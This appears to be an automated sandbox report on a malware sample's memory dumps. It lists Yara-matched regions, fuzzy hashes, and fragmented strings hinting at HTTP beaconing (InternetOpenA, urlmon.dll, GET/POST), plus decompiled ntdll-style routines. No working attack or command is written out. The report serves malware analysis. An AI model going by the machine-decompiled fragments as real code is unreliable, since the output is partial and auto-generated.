                                                        • String ID: .$a$a$e$e$e$g$g$i$i$i$j$p$p
                                                        • API String ID: 0-4291551930
                                                        • Opcode ID: 3ba988212448dd80929e1fc219b27536cec704525788c098fa539b7819e11330
                                                        • Instruction ID: e2216f4ec3cdc32ae685543b05467bdd1ded5bc5b8846a9fd7bad23579d1f4ad
                                                        • Opcode Fuzzy Hash: 3ba988212448dd80929e1fc219b27536cec704525788c098fa539b7819e11330
                                                        • Instruction Fuzzy Hash: C9916F71900708EFDB60DF94CD81BEEB7F9AF88B00F144669E509A7241E775AA84CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 6d38a37dddbf03812769f72ff4792f0ccaa2fbf3c0127631d9b00a6b9815caac
                                                        • Instruction ID: a918445db95bc36bb22261a8d16e602a3b8980c5a36e5711d2f382256670d40b
                                                        • Opcode Fuzzy Hash: 6d38a37dddbf03812769f72ff4792f0ccaa2fbf3c0127631d9b00a6b9815caac
                                                        • Instruction Fuzzy Hash: 4A613EB1D1121CAEEB20DFA4DC85FEEB7B9FF08704F044199E509A6182EBB156448BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 8d77598205e28dcfe4edd4b7da87440968df27c1568679f72b701acfb0c604d7
                                                        • Instruction ID: 0027c24a19135aa27fa20cf44d35d1095eadeae33cae882814c8586aed6072a3
                                                        • Opcode Fuzzy Hash: 8d77598205e28dcfe4edd4b7da87440968df27c1568679f72b701acfb0c604d7
                                                        • Instruction Fuzzy Hash: EC512FB1D1131CAEEB20DFA4DC85FEEBBB9FF08704F044159E505A6182EBB156488FA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$N$e$e$n$o$r$y
                                                        • API String ID: 0-157158463
                                                        • Opcode ID: 39cd1a5ac2d306f7f1d8e0851c75e524d10f6041a92f2df489c2bb1cd57e7e7f
                                                        • Instruction ID: 7684fae9d6d69e6da52db4aaeb42bf8377b4892f8aebc7af7575d7a5019c169a
                                                        • Opcode Fuzzy Hash: 39cd1a5ac2d306f7f1d8e0851c75e524d10f6041a92f2df489c2bb1cd57e7e7f
                                                        • Instruction Fuzzy Hash: 806151B1E0030CAFDB60DFA4D885BEEB7F9EF49700F004559E509E7641EB759A448BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$N$e$e$n$o$r$y
                                                        • API String ID: 0-157158463
                                                        • Opcode ID: fe2bac3f2554d6839a96cc709099239d1d9645dce51afb834e030bff7298a174
                                                        • Instruction ID: fc998393a5cff8d8b54280e86880a8bdf97d1eb096dc44514a4b2d2800893b62
                                                        • Opcode Fuzzy Hash: fe2bac3f2554d6839a96cc709099239d1d9645dce51afb834e030bff7298a174
                                                        • Instruction Fuzzy Hash: 515150B1D0030CAFDB60DFA4D885BEEB7F9EF49700F00455DE509A7241EBB59A448BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: C$U$a$b$d$i$k$n$o
                                                        • API String ID: 0-3121204512
                                                        • Opcode ID: be6cb18e5eec7a021662cb67d95f7c97fa91f0ca95ca833c62488018b7729fed
                                                        • Instruction ID: 4339f0dcea317344d38281af7e351bd4ec8707db8bc7687d192ddf8c5c132d3f
                                                        • Opcode Fuzzy Hash: be6cb18e5eec7a021662cb67d95f7c97fa91f0ca95ca833c62488018b7729fed
                                                        • Instruction Fuzzy Hash: 454161B190030CAFDB10EFA0DC45BEFB7B9EF45704F00851DE519A7242DBB569058BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: URL: $.$L: $e$i$n$o$p
                                                        • API String ID: 0-3631070777
                                                        • Opcode ID: 9ddb18a872856f4c221e0ba63600c8ba8755dc245e705d23e5cb427cee786466
                                                        • Instruction ID: cbf18203cea94e532ed8124cf784a9c5bc4ad557493e8d8cddf6b6586ba66ebb
                                                        • Opcode Fuzzy Hash: 9ddb18a872856f4c221e0ba63600c8ba8755dc245e705d23e5cb427cee786466
                                                        • Instruction Fuzzy Hash: 75811CB1900308AFDB20DFA4CC81BEFB7F9EF44704F044529E519AB252E7B1A945CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F$P$T$f$r$x
                                                        • API String ID: 0-2523166886
                                                        • Opcode ID: f69a521eb55b1ca32e06d3941bc5a91e1205376e735f3a91f233aada2803425b
                                                        • Instruction ID: a857af388b663d016779b92096cac42eccb371e73fda0edf0c9fe9bb92b4dbcd
                                                        • Opcode Fuzzy Hash: f69a521eb55b1ca32e06d3941bc5a91e1205376e735f3a91f233aada2803425b
                                                        • Instruction Fuzzy Hash: F751B4B1900309ABEB74DBE4CC45BFBB3F8EF05704F044569E50996582E7B4AA44CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: P$e$i$m$o$r
                                                        • API String ID: 0-4274970381
                                                        • Opcode ID: a040f3a01c89c286c07d3db6f74ffff15c8fcb7afdfdf7343b025b62eacfbc10
                                                        • Instruction ID: 3f179ec13a9d5479e876bb658ceab0561faef8866cb6c9f7102c5756b71e6d24
                                                        • Opcode Fuzzy Hash: a040f3a01c89c286c07d3db6f74ffff15c8fcb7afdfdf7343b025b62eacfbc10
                                                        • Instruction Fuzzy Hash: 3431737195031C6BEB21DBA4DC42FEE777DEF48700F404199F509AA182EFB16B848BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$FBIMG$FBIMG$g$i$p
                                                        • API String ID: 0-1737736949
                                                        • Opcode ID: 7200807fb254a1370332410a00b877fe38e396150b2652f270615f3e51ddcd7b
                                                        • Instruction ID: 4b14ee3bd47ac5823d113e9211295dd9f77b013281d62dea4dedf0c6f31d7f46
                                                        • Opcode Fuzzy Hash: 7200807fb254a1370332410a00b877fe38e396150b2652f270615f3e51ddcd7b
                                                        • Instruction Fuzzy Hash: 9B316D75940208ABDB50EFA4D841FEF77F9FF89700F04441AFA19AB281D7B559448BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$FBIMG$FBIMG$g$i$p
                                                        • API String ID: 0-1737736949
                                                        • Opcode ID: 4cb00058f657d97277b6175baa5e96c59cb7ca6a811c9a23e0f4a48569ef5a87
                                                        • Instruction ID: c89a7489b7229e937f9145b7d6cf5ab667a9e97dc11209843187974f7850fc71
                                                        • Opcode Fuzzy Hash: 4cb00058f657d97277b6175baa5e96c59cb7ca6a811c9a23e0f4a48569ef5a87
                                                        • Instruction Fuzzy Hash: 87318F71900308ABDB50DFA4D841FEFB7F9FF89700F04441AE918AB281D7B56944CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                        • API String ID: 0-3155091674
                                                        • Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                                        • Instruction ID: 487ef5eaff419ddfd9c07d4d7f19f4e027a2de09f168cb7f9a9a2a7815e9a27c
                                                        • Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                                        • Instruction Fuzzy Hash: DAF019B2A01118AF9B14DF98DC419FBB7BCEF48310B048689BE1897301D635AE508BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                        • API String ID: 0-3155091674
                                                        • Opcode ID: ddd81a3a0578cbdbb02d01a3313964d737a9816d535c767ab431dd0820f437ff
                                                        • Instruction ID: 40be9d8f21ba619cf90467dd08e2da3e577aad656a7a68c9394033326065fce6
                                                        • Opcode Fuzzy Hash: ddd81a3a0578cbdbb02d01a3313964d737a9816d535c767ab431dd0820f437ff
                                                        • Instruction Fuzzy Hash: 62F01DB2A01119AF8B14DF98D9419FF7BB9EF45300B148149BE5897302D670AE518BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Expl$GET$Windows Expl$Windows Expl$rer
                                                        • API String ID: 0-314038199
                                                        • Opcode ID: 1b6f0c81888b4b1b63cc09b268f06bd435d36fea290a5276130dbe15d4788aee
                                                        • Instruction ID: cea4296da33ef3231e7594cd6021ad55c8750b73977f43a578c9210ceba432b2
                                                        • Opcode Fuzzy Hash: 1b6f0c81888b4b1b63cc09b268f06bd435d36fea290a5276130dbe15d4788aee
                                                        • Instruction Fuzzy Hash: 7B519671A40209BBEB20DF54DC82FFE77B8EB45704F144059FE086B282E774AA51CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: */*$POST$POST$Windows Expl$rer
                                                        • API String ID: 0-1278404498
                                                        • Opcode ID: f12aef5bf78a3f618af6104860a5b5e1f0ee71d21e3bc1cf4f4001a83702a766
                                                        • Instruction ID: 56e7d3525ec65294be83e29fb4303fb5ee486fea62caecccff371cfc17dbcac6
                                                        • Opcode Fuzzy Hash: f12aef5bf78a3f618af6104860a5b5e1f0ee71d21e3bc1cf4f4001a83702a766
                                                        • Instruction Fuzzy Hash: C95174B1D00249BFEB11DFA4DC42FEE77B8AF45304F044159F509AB282E7705A54CBA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4$dll$ion.$ion.dll$vers
                                                        • API String ID: 0-4275468499
                                                        • Opcode ID: 0cbf8fd1512fca162ce08393d244feec180effcf885e59fc00f313af5555fe5a
                                                        • Instruction ID: 14066517e324c4e6b0f8dbffa91e207f03f87ab154bb210309073fd6bebb9fc9
                                                        • Opcode Fuzzy Hash: 0cbf8fd1512fca162ce08393d244feec180effcf885e59fc00f313af5555fe5a
                                                        • Instruction Fuzzy Hash: 48418F72900219ABDF20DFE5CC81FEFB7BCEF45740F044159F918AA181DA71AA14DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: C$a$b$d$i
                                                        • API String ID: 0-2334916691
                                                        • Opcode ID: f95e0e6f3ba57f508010e39c55bf9e06b052d0110034ba8ed36beb66b15d6d1e
                                                        • Instruction ID: cd5ea9d5231370619e8d05d30554830bf9f7f80c0d91831f35b625ca471b3b66
                                                        • Opcode Fuzzy Hash: f95e0e6f3ba57f508010e39c55bf9e06b052d0110034ba8ed36beb66b15d6d1e
                                                        • Instruction Fuzzy Hash: 96317FB5900308ABDB10EFA0DC85FEEB7B9EF45704F00851DF519A7242EBB4690587A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Expl$GET$Windows Expl$Windows Expl$rer
                                                        • API String ID: 0-314038199
                                                        • Opcode ID: 96f24b9a5646ff5127bb2da5d61196845184b27f665757bff7c49a9122a3f91a
                                                        • Instruction ID: e36a32d6fb0068e115bcefc898b0128ce5a8b6b025a427e50bde9d91d95f936a
                                                        • Opcode Fuzzy Hash: 96f24b9a5646ff5127bb2da5d61196845184b27f665757bff7c49a9122a3f91a
                                                        • Instruction Fuzzy Hash: 1B319371A41219BBEB21DF518C82FEE7BB8AB45B04F144155F6087F2C2D7B0AA11CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Us$: $er-A$gent$urlmon.dll
                                                        • API String ID: 0-1367105278
                                                        • Opcode ID: 184153eb36e171d3392621ca07b8cbf372f0cb497445b0b5819af74d026556e4
                                                        • Instruction ID: a0f52c4d66b4a28058ad033c43f4722de5ccef2c5dfdc7c6da1c64c43ddf6f80
                                                        • Opcode Fuzzy Hash: 184153eb36e171d3392621ca07b8cbf372f0cb497445b0b5819af74d026556e4
                                                        • Instruction Fuzzy Hash: 66118EB1E01219AADB00DE959C02BEEBBB8AB45714F000059EC04AA241E2B45B0187E6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Us$: $er-A$gent$urlmon.dll
                                                        • API String ID: 0-1367105278
                                                        • Opcode ID: 97d27832f28f549c3455fada48f2fae123f7f02aa03623e7613e097dd745b1b3
                                                        • Instruction ID: 50463f5a4f19b6be9471316e404fdba67e6ad86e119f6b5e1fa5c8d4d0604045
                                                        • Opcode Fuzzy Hash: 97d27832f28f549c3455fada48f2fae123f7f02aa03623e7613e097dd745b1b3
                                                        • Instruction Fuzzy Hash: FF118CB1D01219AAEB00DF95CD02BFFBBB8EF45B44F100059F904BA281D3B45B018BA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 26%
                                                        			E1E29645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                        				signed int _v8;
                                                        				void* _v36;
                                                        				intOrPtr _v48;
                                                        				intOrPtr _v52;
                                                        				intOrPtr _v56;
                                                        				char _v60;
                                                        				char _v64;
                                                        				intOrPtr _v68;
                                                        				intOrPtr _v72;
                                                        				intOrPtr _v76;
                                                        				intOrPtr _v80;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				intOrPtr _t48;
                                                        				intOrPtr _t49;
                                                        				intOrPtr _t50;
                                                        				intOrPtr* _t52;
                                                        				char _t56;
                                                        				void* _t69;
                                                        				char _t72;
                                                        				void* _t73;
                                                        				intOrPtr _t75;
                                                        				intOrPtr _t79;
                                                        				void* _t82;
                                                        				void* _t84;
                                                        				intOrPtr _t86;
                                                        				void* _t88;
                                                        				signed int _t90;
                                                        				signed int _t92;
                                                        				signed int _t93;
                                                        
                                                        				_t80 = __edx;
                                                        				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                                                        				_v8 =  *0x1e35d360 ^ _t92;
                                                        				_t72 = 0;
                                                        				_v72 = __edx;
                                                        				_t82 = __ecx;
                                                        				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                                                        				_v68 = _t86;
                                                        				E1E2AFA60( &_v60, 0, 0x30);
                                                        				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                                                        				_t93 = _t92 + 0xc;
                                                        				_v76 = _t48;
                                                        				_t49 = _t48;
                                                        				if(_t49 == 0) {
                                                        					_push(5);
                                                        					 *((char*)(_t82 + 0x6a)) = 0;
                                                        					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                                                        					goto L3;
                                                        				} else {
                                                        					_t69 = _t49 - 1;
                                                        					if(_t69 != 0) {
                                                        						if(_t69 == 1) {
                                                        							_push(0xa);
                                                        							goto L3;
                                                        						} else {
                                                        							_t56 = 0;
                                                        						}
                                                        					} else {
                                                        						_push(4);
                                                        						L3:
                                                        						_pop(_t50);
                                                        						_v80 = _t50;
                                                        						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                                                        							E1E282280(_t50, _t86 + 0x1c);
                                                        							_t79 = _v72;
                                                        							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                        							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                                                        							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                                                        							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                                                        							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                                                        							E1E27FFB0(_t72, _t82, _t86 + 0x1c);
                                                        						}
                                                        						_t75 = _v80;
                                                        						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                                                        						_t80 =  *_t52;
                                                        						_v72 =  *((intOrPtr*)(_t52 + 4));
                                                        						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                                                        						_v60 = 0x30;
                                                        						_v56 = _t75;
                                                        						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                                                        						asm("movsd");
                                                        						_v76 = _t80;
                                                        						_v64 = 0x30;
                                                        						asm("movsd");
                                                        						asm("movsd");
                                                        						asm("movsd");
                                                        						if(_t80 != 0) {
                                                        							 *0x1e35b1e0(_t75, _v72,  &_v64,  &_v60);
                                                        							_t72 = _v76();
                                                        						}
                                                        						_t56 = _t72;
                                                        					}
                                                        				}
                                                        				_pop(_t84);
                                                        				_pop(_t88);
                                                        				_pop(_t73);
                                                        				return E1E2AB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                                                        			}


































                                                        0x1e29645b
                                                        0x1e296463
                                                        0x1e29646d
                                                        0x1e296475
                                                        0x1e29647a
                                                        0x1e29647e
                                                        0x1e296480
                                                        0x1e29648c
                                                        0x1e296490
                                                        0x1e296495
                                                        0x1e296498
                                                        0x1e29649b
                                                        0x1e29649f
                                                        0x1e2964a1
                                                        0x1e2d7c07
                                                        0x1e2d7c09
                                                        0x1e2d7c0c
                                                        0x00000000
                                                        0x1e2964a7
                                                        0x1e2964a7
                                                        0x1e2964aa
                                                        0x1e2d7bf7
                                                        0x1e2d7c00
                                                        0x00000000
                                                        0x1e2d7bf9
                                                        0x1e2d7bf9
                                                        0x1e2d7bf9
                                                        0x1e2964b0
                                                        0x1e2964b0
                                                        0x1e2964b2
                                                        0x1e2964b2
                                                        0x1e2964b3
                                                        0x1e2964ba
                                                        0x1e296553
                                                        0x1e29655e
                                                        0x1e296566
                                                        0x1e29656c
                                                        0x1e296575
                                                        0x1e29657f
                                                        0x1e296585
                                                        0x1e296588
                                                        0x1e296588
                                                        0x1e2964c7
                                                        0x1e2964cb
                                                        0x1e2964ce
                                                        0x1e2964d3
                                                        0x1e2964da
                                                        0x1e2964e5
                                                        0x1e2964ed
                                                        0x1e2964f1
                                                        0x1e2964f5
                                                        0x1e2964f6
                                                        0x1e2964fa
                                                        0x1e296502
                                                        0x1e296503
                                                        0x1e296504
                                                        0x1e296507
                                                        0x1e29651a
                                                        0x1e296524
                                                        0x1e296524
                                                        0x1e296526
                                                        0x1e296526
                                                        0x1e2964aa
                                                        0x1e29652c
                                                        0x1e29652d
                                                        0x1e29652e
                                                        0x1e296539

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0$0
                                                        • API String ID: 3446177414-203156872
                                                        • Opcode ID: 05ed384b3a916d41095e36b3d20a9e0985a9124636ae2666fb405762d4772b0c
                                                        • Instruction ID: c8fe4bb56b7c6dc6b939153388bd09f95936cebb4e2909e580bf9ae6a09722a4
                                                        • Opcode Fuzzy Hash: 05ed384b3a916d41095e36b3d20a9e0985a9124636ae2666fb405762d4772b0c
                                                        • Instruction Fuzzy Hash: 87418AB56087529FC310CF28C494A5ABBE5FF88704F104A2EF988DB340D735EA49CB96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 53%
                                                        			E1E2FFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                        				void* _t7;
                                                        				intOrPtr _t9;
                                                        				intOrPtr _t10;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t13;
                                                        				intOrPtr _t14;
                                                        				intOrPtr* _t15;
                                                        
                                                        				_t13 = __edx;
                                                        				_push(_a4);
                                                        				_t14 =  *[fs:0x18];
                                                        				_t15 = _t12;
                                                        				_t7 = E1E2ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                        				_push(_t13);
                                                        				E1E2F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                        				_t9 =  *_t15;
                                                        				if(_t9 == 0xffffffff) {
                                                        					_t10 = 0;
                                                        				} else {
                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                        				}
                                                        				_push(_t10);
                                                        				_push(_t15);
                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                        				return E1E2F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                        			}










                                                        0x1e2ffdda
                                                        0x1e2ffde2
                                                        0x1e2ffde5
                                                        0x1e2ffdec
                                                        0x1e2ffdfa
                                                        0x1e2ffdff
                                                        0x1e2ffe0a
                                                        0x1e2ffe0f
                                                        0x1e2ffe17
                                                        0x1e2ffe1e
                                                        0x1e2ffe19
                                                        0x1e2ffe19
                                                        0x1e2ffe19
                                                        0x1e2ffe20
                                                        0x1e2ffe21
                                                        0x1e2ffe22
                                                        0x1e2ffe25
                                                        0x1e2ffe40

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E2FFDFA
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E2FFE2B
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E2FFE01
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                        • API String ID: 885266447-3903918235
                                                        • Opcode ID: afb729e34e4f9bee8baf3c444a9076fc85c4526f083e5f1c171b26012ca7651d
                                                        • Instruction ID: a7063f2504929264aad1ea60fd4e7f283e376b6290dc56ae88b44ef0137f8fa2
                                                        • Opcode Fuzzy Hash: afb729e34e4f9bee8baf3c444a9076fc85c4526f083e5f1c171b26012ca7651d
                                                        • Instruction Fuzzy Hash: DEF0F63B540141BFE6244A45DD11F67BF6AEB45730F240314F628566D1EA62FC6086F0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$D$\$x
                                                        • API String ID: 0-3596669699
                                                        • Opcode ID: 75254b51869ae763b8929788a0c2fce695b126924fc71c8889935280f095ce96
                                                        • Instruction ID: 739137aed9e153a8dd63ad3801ef6912ea5c01f18674833e289cdfc0787ce47a
                                                        • Opcode Fuzzy Hash: 75254b51869ae763b8929788a0c2fce695b126924fc71c8889935280f095ce96
                                                        • Instruction Fuzzy Hash: 8151A7B19502187AE750DF949C42FFF73ACDF89314F004159FA09A6182EBF56A44CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: P$r$s$w
                                                        • API String ID: 0-3891800351
                                                        • Opcode ID: 982cdfea5464a7ea42907472e98b8abec65724c6adcd49b3353d2e31fdaab00a
                                                        • Instruction ID: db5aab7c5a79df559f92c0e6f3305c240771f79712d7af5e65962346ba5176fb
                                                        • Opcode Fuzzy Hash: 982cdfea5464a7ea42907472e98b8abec65724c6adcd49b3353d2e31fdaab00a
                                                        • Instruction Fuzzy Hash: 555132B5D00208AFDB50DFA4C881BEEBBF5EF48710F24456DE919EB242E7749A04CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -$A$I$M
                                                        • API String ID: 0-1664541526
                                                        • Opcode ID: 7b3cc152e06750ea6291ca1f426f086cad49b6574cd1db7f416362b8f267c112
                                                        • Instruction ID: d686c0815dad119842ccbef62b661499c358b0408bcdce50622aafbe2d8bc8bc
                                                        • Opcode Fuzzy Hash: 7b3cc152e06750ea6291ca1f426f086cad49b6574cd1db7f416362b8f267c112
                                                        • Instruction Fuzzy Hash: 3EF08975D0021CBBEB10DA94AC45BFD7BECEB04318F4041A6FD08A6242E7F15E5887D2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02454B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02454B87,007A002E,00000000,00000060,00000000,00000000), ref: 02459D8D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: .z`
                                                        • API String ID: 823142352-1441809116
                                                        • Opcode ID: 331baeac137bff5aa9f04c447d50184ed81edd3f1126455ff29ba6e4cd96d47a
                                                        • Instruction ID: a5aed55b85b42897ae8baab0533e106e9c9c6dad09520f89f9028952e297f676
                                                        • Opcode Fuzzy Hash: 331baeac137bff5aa9f04c447d50184ed81edd3f1126455ff29ba6e4cd96d47a
